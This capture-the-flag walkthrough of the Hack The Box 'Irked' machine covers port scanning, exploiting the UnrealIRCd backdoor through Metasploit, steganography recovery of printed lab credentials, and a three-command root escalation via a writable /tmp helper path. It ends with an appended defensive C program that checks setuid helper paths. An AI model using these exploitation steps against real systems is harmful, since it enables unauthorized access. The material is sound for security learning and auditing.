/var/log $ cat "Hack The Box - Irked Walkthrough"

2019-04-27 | hackthebox ctf 

Machine Info

Irked Machine Info

Initial Recon

# nmap -p- -sC -sV 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-15 15:06 CEST
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          38556/tcp  status
|_  100024  1          44061/udp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
38556/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.22 seconds

Own User

Enumerating Port 80

This is what we get when opening the address in our browser:

Irked Website

The source of the page is useless, and bruteforcing files and directories with gobuster doesn’t reveal anything helpful either:

# gobuster -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.117 -x html,html,php,txt,xml,bak

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.117/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,txt,xml,bak,html
[+] Expanded     : true
[+] Timeout      : 10s
=====================================================
2019/04/15 15:07:45 Starting gobuster
=====================================================
http://10.10.10.117/index.html (Status: 200)
http://10.10.10.117/manual (Status: 301)
http://10.10.10.117/server-status (Status: 403)
=====================================================
2019/04/15 16:11:16 Finished
=====================================================

The ‘manual’ directory contains only the expected Apache documentation:

Apache Doc

It seems this is a dead end.

Enumerating IRC

Connecting to the IRC service shows that the box runs UnrealIRCd version 3.2.8.1:

Connecting to IRC

With this information we can search for possible vulnerabilities:

Searching for Vulnerabilities

The ‘Backdoor Command Execution’ entry in particular looks promising. As described in CVE-2010-2075, a backdoored build of this exact version was distributed for several months. nmap comes with a handy script to check whether the running instance contains it:

Check for UnrealIRCd Backdoor

Exploiting the UnrealIRCd Backdoor

A detailed explanation of the backdoor can be found in the posts “UnrealIRCd 3.2.8.1 backdoored, investigation” and “Metasploitable 2 How-to - IRC Backdoor exploitation (Metasploit & python)”. Using the Metasploit module ‘exploit/unix/irc/unreal_ircd_3281_backdoor’ described there, we can exploit the backdoor to gain access:

Backdoor Exploitation with metasploit

Now that we’re in, we spawn a shell and look for the flag. Presumably it is in the home directory of ‘djmardov’:

Shell as 'ircd'

And indeed the user flag is there, but we can’t read it. There is, however, another file named .backup which could be helpful:

Finding '.backup'

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

We can assume that ‘steg’ is short for steganography. It seems ‘UPupDOWNdownLRlrBAbaSSss’ is the password for some data hidden inside another file. So we need to find this file. Actually the machine’s name ‘Irked’ is a hint for this.

To be honest, I originally had no idea where to use the password. So after some wasted time I switched to seeing what else I could do from this low-privilege shell, and as it turned out you can go directly to root from there without getting access as ‘djmardov’ first. That is what I did. When I came back to the box to write this up I looked for hints in the Hack The Box forum and was finally able to figure it out. But as said, you can skip this part if you like.

Getting the User Flag

The file in question is the emoticon (irked.jpg) from the website (see above). Using steghide with the password ‘UPupDOWNdownLRlrBAbaSSss’ we can extract a file named pass.txt which probably contains the password for the user ‘djmardov’:

Extracting 'pass.txt' with steghide

Switching to user ‘djmardov’ using the password ‘Kab6h+m+bbp2J:HG’ works. Now we can retrieve the user flag:

Irked User Flag

We can also ssh into the box now with these credentials (‘djmardov:Kab6h+m+bbp2J:HG’), or simply proceed with the shell we already have.

Own root

Using basic Linux privilege escalation enumeration we find the odd file /usr/bin/viewuser, which runs with root privileges:

Finding '/usr/bin/viewuser'

Running it produces the following output:

Running 'viewuser'

I copied the file over to my Kali VM for further analysis. I’m really not good at assembly, but from what I understood the program sets the process UID to 0 and then executes /tmp/listusers. I’m not sure this understanding is entirely correct, but it was enough to gain a root shell with just three commands:

echo "/bin/bash" > /tmp/listusers
chmod +x /tmp/listusers
viewuser

And here’s the whole thing in action:

Irked Root Flag
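The three commands work because a root-privileged binary executes a fixed path inside a world-writable directory, so whoever creates that file first decides what root runs. As an added example that is not part of the original write-up and is not the viewuser binary’s own code, the C program below implements the checks such a program should make before switching to uid 0 and exec’ing a helper: absolute path, parent directory not writable by others, file present, regular, root-owned and not writable by group or world. The path /tmp/listusers comes from the page; the function and flag names (check_exec_target, privileged_helper_allowed, EXEC_*) are this example’s own.

```c
#define _DEFAULT_SOURCE
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Reasons a setuid-root program should refuse to exec a helper path.
 * (Flag names are this example's own, not taken from viewuser.) */
enum exec_problem {
    EXEC_OK             = 0,
    EXEC_NOT_ABSOLUTE   = 1 << 0,  /* relative path: resolved against a caller-chosen cwd */
    EXEC_DIR_WRITABLE   = 1 << 1,  /* parent dir writable by group/others, e.g. /tmp (1777) */
    EXEC_NOT_FOUND      = 1 << 2,  /* missing: whoever creates it first decides what root runs */
    EXEC_NOT_REGULAR    = 1 << 3,  /* directory, device, socket, ... */
    EXEC_NOT_ROOT_OWNED = 1 << 4,  /* owner is not uid 0 */
    EXEC_GROUP_WRITABLE = 1 << 5,
    EXEC_WORLD_WRITABLE = 1 << 6,
};

/* Copy the parent directory of path into out ("/" for "/x", "." for a bare name). */
static int parent_dir(const char *path, char *out, size_t outsz)
{
    const char *slash = strrchr(path, '/');
    size_t len;

    if (slash == NULL) {
        path = ".";
        len = 1;
    } else if (slash == path) {
        len = 1;                       /* "/x" -> "/" */
    } else {
        len = (size_t)(slash - path);
    }
    if (len + 1 > outsz)
        return -1;
    memcpy(out, path, len);
    out[len] = '\0';
    return 0;
}

/* Inspect a helper the way a setuid binary should before setuid(0) + exec.
 * Returns a bitmask of exec_problem flags; EXEC_OK means the target looks trustworthy. */
unsigned check_exec_target(const char *path)
{
    unsigned problems = 0;
    struct stat st;
    char dir[PATH_MAX];

    if (path[0] != '/')
        problems |= EXEC_NOT_ABSOLUTE;

    /* The directory matters even when the file exists: in a world-writable
     * directory an unprivileged user can create or replace the helper. */
    if (parent_dir(path, dir, sizeof dir) == 0 && stat(dir, &st) == 0 &&
        (st.st_mode & (S_IWGRP | S_IWOTH)))
        problems |= EXEC_DIR_WRITABLE;

    if (stat(path, &st) != 0)
        return problems | EXEC_NOT_FOUND;

    if (!S_ISREG(st.st_mode))
        problems |= EXEC_NOT_REGULAR;
    if (st.st_uid != 0)
        problems |= EXEC_NOT_ROOT_OWNED;
    if (st.st_mode & S_IWGRP)
        problems |= EXEC_GROUP_WRITABLE;
    if (st.st_mode & S_IWOTH)
        problems |= EXEC_WORLD_WRITABLE;
    return problems;
}

/* Policy gate: only exec when every check passes. */
int privileged_helper_allowed(const char *path)
{
    return check_exec_target(path) == EXEC_OK;
}

int main(int argc, char **argv)
{
    /* /tmp/listusers is the path the page's viewuser binary executes. */
    const char *path = argc > 1 ? argv[1] : "/tmp/listusers";
    unsigned p = check_exec_target(path);
    static const struct { unsigned flag; const char *why; } reasons[] = {
        { EXEC_NOT_ABSOLUTE,   "path is not absolute" },
        { EXEC_DIR_WRITABLE,   "parent directory is group/world writable" },
        { EXEC_NOT_FOUND,      "file does not exist" },
        { EXEC_NOT_REGULAR,    "not a regular file" },
        { EXEC_NOT_ROOT_OWNED, "not owned by root" },
        { EXEC_GROUP_WRITABLE, "group writable" },
        { EXEC_WORLD_WRITABLE, "world writable" },
    };

    printf("%s: %s\n", path, p == EXEC_OK ? "acceptable helper" : "REFUSING to run as root");
    for (size_t i = 0; i < sizeof reasons / sizeof reasons[0]; i++)
        if (p & reasons[i].flag)
            printf("  - %s\n", reasons[i].why);
    return p == EXEC_OK ? 0 : 1;
}
```

Run it without arguments on a box like Irked and it reports that /tmp/listusers lives in a world-writable directory and (before the three commands) does not even exist, both of which are reasons to refuse. The same checks are what an auditor looks for when reviewing any setuid binary: a helper path should point at a root-owned file in a root-owned directory such as /usr/sbin, never into /tmp or a user’s home.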